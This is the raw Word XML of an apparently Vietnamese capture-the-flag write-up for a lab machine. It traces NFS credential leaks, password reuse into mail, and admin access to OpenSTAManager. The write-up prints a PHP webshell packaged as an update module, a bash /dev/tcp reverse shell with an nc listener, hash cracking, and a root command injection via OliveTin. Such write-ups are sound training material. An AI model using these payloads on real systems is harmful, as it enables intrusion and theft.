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3F1EC6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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB516A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Sử dụng nmap để scan toàn bộ port và service của target IP. Kết quả đáng chú ý: NFS mở ở port 111/2049 (rpcbind/mountd/nfs), Dovecot IMAP/POP3 (143, 993, 995). NFS export công khai luôn là điểm cần kiểm tra đầu tiên bằng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showmount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2405" cy="2948940"/>
            <wp:effectExtent l="0" t="0" r="63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24263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Khai thác NFS misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38A51B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showmount -e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liệt kê được share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/srv/nfs/onboarding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export ra cho tất cả (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*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), không giới hạn IP — misconfiguration cho phép mount từ bất kỳ máy nào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78DEE4C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147060" cy="6553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07DAB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Mount share về máy mình, thấy 1 file PDF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New_Employee_Access.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Đây là kiểu misconfiguration kinh điển: dữ liệu nội bộ (thư mời nhân viên mới) bị để trên share không kiểm soát quyền truy cập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6308ED1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968240" cy="133350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B396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eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.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pdftotext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đọc PDF ra creds thật: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kevin / Enigma2024!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cho webmail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mail001.enigma.htb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→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Bài học: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NFS misconfig không cho RCE trực tiếp, nhưng làm lộ credential để đi tiếp vào service khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521D3F7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2405" cy="3745230"/>
            <wp:effectExtent l="0" t="0" r="63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4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5DEF5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Truy cập mail qua IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0E3A7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5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Login IMAP bằng tay qua telnet/openssl với creds của Kevin, đọc được mail từ Sarah (phòng Accounts) — chỉ là mail chào mừng, chưa có gì khai thác được nhưng có tên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sarah@enigma.htb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485465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D5F115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0340" cy="2159635"/>
            <wp:effectExtent l="0" t="0" r="12700" b="4445"/>
            <wp:docPr id="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FFEB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6.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Thử login IMAP bằng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sarah / Enigma2024!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(đoán reuse password) — vào được, đọc mail từ IT gửi Sarah chứa creds thật của portal quản lý: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http://support_001.enigma.htb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admin / Ne3s4rtars78s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→ Đây chính là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credential reuse chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: NFS leak → mail creds → mail chứa creds tiếp theo cho web app nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0361F2C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2245" cy="2176145"/>
            <wp:effectExtent l="0" t="0" r="1079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17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9FC4F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Khai thác web app OpenSTAManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F18ED">
      <w:pPr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Dùng Burp login vào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support_001.enigma.htb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bằng creds vừa lấy, vào được dashboard admin của OpenSTAManager (phần mềm quản lý CRM/ticket mã nguồn mở).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86B62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1610" cy="2386330"/>
            <wp:effectExtent l="0" t="0" r="1143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7AA00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Vào module "Updates" (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id_module=6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) — module cho phép admin upload file cập nhật hệ thống (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Carica aggiornamento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= "Upload update" tiếng Ý). Đây chính là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attack surface chính</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: chức năng upload file của admin, nếu không validate đúng loại file → arbitrary file upload → RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259F2FF0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File MODULE :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6236A5CC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name = "Shell"              → tên hiển thị module trên giao diện admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B51F25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version = "1.0.0"           → version, để app track cập nhật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D057E39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directory = "shell"         → tên thư mục sẽ được giải nén vào trong /modules/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC7121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options = ""                → cấu hình thêm (rỗng = không cần)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EEFE94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compatibility = "2.9.8"     → khai báo tương thích với version OpenSTAManager nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71251C23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icon = "fa fa-terminal"     → icon hiển thị (Font Awesome), không liên quan bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6307A4BE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File shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392F0049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&lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2740DC68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Cả 2 file được đóng gói vào file update.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7866895C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ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Đây chính là lỗ hổng gốc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2026-38751</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: chức năng upload module </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>không kiểm tra nội dung file bên trong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, chỉ cần có file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MODULE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> hợp lệ (đúng field bắt buộc) là app tin tưởng và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">tự động giải nén toàn bộ zip vào </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/modules/&lt;directory&gt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên server — tức là thư mục nằm trong web root, truy cập được qua HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78205B2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1610" cy="2430780"/>
            <wp:effectExtent l="0" t="0" r="11430" b="762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9024F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Log lại các request POST tới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/controller.php?id_module=6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khi upload — xác nhận flow upload đi qua đâu để build request khai thác thủ công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A0D81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2405" cy="453390"/>
            <wp:effectExtent l="0" t="0" r="635" b="381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8E0B5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RCE qua webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC1B3E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Sau khi upload webshell thành công vào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/modules/shell/shell.php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test bằng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?cmd=id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→ trả về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uid=33(www-data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Confirm RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E07F4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB3EAD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2405" cy="2583815"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985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85968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Đổi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cmd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thành payload reverse shell bash (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bash -c 'bash -i &gt;&amp; /dev/tcp/.../4444 0&gt;&amp;1'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) — nhưng response là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504 Gateway Timeout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đây là dấu hiệu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bình thường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khi reverse shell chạy thành công (request bị treo vì process không trả response HTTP, nginx timeout) — không phải lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7521B75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040" cy="2408555"/>
            <wp:effectExtent l="0" t="0" r="0" b="14605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83DD3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Bên listener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nc -lvnp 4444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nhận được connection, có shell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www-data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thật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294E25F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0500" cy="1167765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715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6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57F3F">
      <w:pP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 xml:space="preserve">VI.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Local enumeration — tìm DB credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484A083E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Đọc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config.inc.php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của OpenSTAManager — file config luôn chứa DB creds plaintext (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brollin / Fri3nds@9099</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>). Quy tắc chung: bất kỳ app PHP nào bị RCE, việc đầu tiên luôn là tìm file config đọc DB creds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7D63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7325" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620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7D9E4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Login MySQL bằng creds đó, liệt kê database → tìm bảng có chữ "user" → dump bảng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zz_users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lấy được password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hash bcrypt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của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admin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và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haris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5F57CE81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E09A8D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2880" cy="1043305"/>
            <wp:effectExtent l="0" t="0" r="10160" b="8255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04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E1C71">
      <w:pP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 xml:space="preserve">VII.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Crack hash &amp; chiếm user haris</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7729DADB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Dùng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hashcat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với mode 3200 (bcrypt) + rockyou.txt crack được password của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haris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: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bestfriends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599F197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2405" cy="3350260"/>
            <wp:effectExtent l="0" t="0" r="635" b="2540"/>
            <wp:docPr id="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0A0E5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su haris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bằng password vừa crack → chuyển từ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www-data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(webshell, quyền thấp/không ổn định) sang user hệ thống thật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haris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38932CF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9230" cy="2099945"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="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A7336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Đọc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/home/haris/user.txt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→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user flag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1A03A31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5420" cy="891540"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="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59755">
      <w:pP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 xml:space="preserve">VIII.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Privilege Escalation lên root qua OliveTin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552BB929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ps aux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thấy process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/usr/local/bin/OliveTin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chạy bằng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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. OliveTin là tool tự động hoá — cho phép admin định nghĩa các "action" (script) chạy qua web UI/API, thường chạy với quyền cao để thực hiện task hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E48B5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4310" cy="1259205"/>
            <wp:effectExtent l="0" t="0" r="13970" b="5715"/>
            <wp:docPr id="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784A4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Tìm file cấu hình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/etc/OliveTin/config.yaml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— thấy service chỉ listen nội bộ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127.0.0.1:1337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(không expose ra ngoài, đó là lý do phải đứng trong session SSH để gọi API, như t giải thích trước). Đọc tiếp config sẽ thấy action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backup_database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với tham số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db_pass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kiểu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password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không bị validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE1BF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1770" cy="3836035"/>
            <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
            <wp:docPr id="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3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C4CBE">
      <w:pPr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69865" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620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AE5D5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Khai thác: gọi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POST /api/StartAction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với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db_pass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chứa payload đóng dấu nháy đơn rồi chèn lệnh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chmod +s /bin/bash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Vì action chạy bằng root, lệnh chèn cũng chạy quyền root →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/bin/bash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bị gắn SUID →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bash -p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giữ euid=0 → đọc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root.txt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6F9644A6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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2472690"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="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968937A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325B7C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8D325B7C"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="F7999667"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F7999667"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="4CEA20A3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4CEA20A3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E40C5C"/>
    <w:rsid w:val="0AED0A9E"/>
    <w:rsid w:val="0DE40C5C"/>
    <w:rsid w:val="18902322"/>
    <w:rsid w:val="232946DA"/>
    <w:rsid w:val="30A12956"/>
    <w:rsid w:val="54D9357C"/>
    <w:rsid w:val="588C013C"/>
    <w:rsid w:val="61E50CFC"/>
    <w:rsid w:val="65F06E06"/>
    <w:rsid w:val="73C67A96"/>
    <w:rsid w:val="7BE72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631</Words>
  <Characters>2988</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>39</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3599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2026-07-08T07:27:00Z</dcterms:created>
  <dc:creator>Tú Ngô</dc:creator>
  <cp:lastModifiedBy>Tú Ngô</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-12T13:30:17Z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E9BF9C15E8884D929B9188C7B15B54DB_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMzcyODMxYTE0ZTc0ZGU3Y2QwODc3MzYzN2Q1YmNiM2EiLCJ1c2VySWQiOiIxMzkyMTA4NDM5NDU0In0=</vt:lpwstr>
  </property>
</Properties>
</file>